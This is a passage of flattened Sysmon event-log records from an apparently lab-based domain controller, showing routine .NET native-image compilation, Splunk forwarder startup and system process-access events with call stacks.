ramework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:44.209{59A5CD1D-926F-6005-A704-00000000A301}1464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\5b8-0\UIAutomationClientsideProviders.dll2021-01-18 13:51:44.209 11241100x80000000000000008966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 
13:51:45.896{59A5CD1D-9271-6005-B404-00000000A301}3796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\ed4-0\XsdBuildTask.dll2021-01-18 13:51:45.896 10341000x80000000000000008965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.787{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9271-6005-B404-00000000A301}3796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.771{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9271-6005-B404-00000000A301}3796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:45.771{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9271-6005-B404-00000000A301}3796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:45.724{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9271-6005-B304-00000000A301}4664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.709{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9271-6005-B304-00000000A301}4664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:45.709{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9271-6005-B304-00000000A301}4664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:45.646{59A5CD1D-9271-6005-B104-00000000A301}4304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\10d0-0\XamlBuildTask.dll2021-01-18 13:51:45.646 10341000x80000000000000008958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.521{59A5CD1D-9271-6005-B204-00000000A301}44765008C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.381{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9271-6005-B204-00000000A301}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:45.381{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.381{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:45.381{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.381{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:45.381{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.381{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:45.381{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.381{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:45.381{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.381{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9271-6005-B204-00000000A301}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.381{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9271-6005-B204-00000000A301}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.383{59A5CD1D-9271-6005-B204-00000000A301}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:45.349{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9271-6005-B104-00000000A301}4304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.349{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9271-6005-B104-00000000A301}4304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:45.349{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9271-6005-B104-00000000A301}4304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:45.287{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9271-6005-B004-00000000A301}2532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.D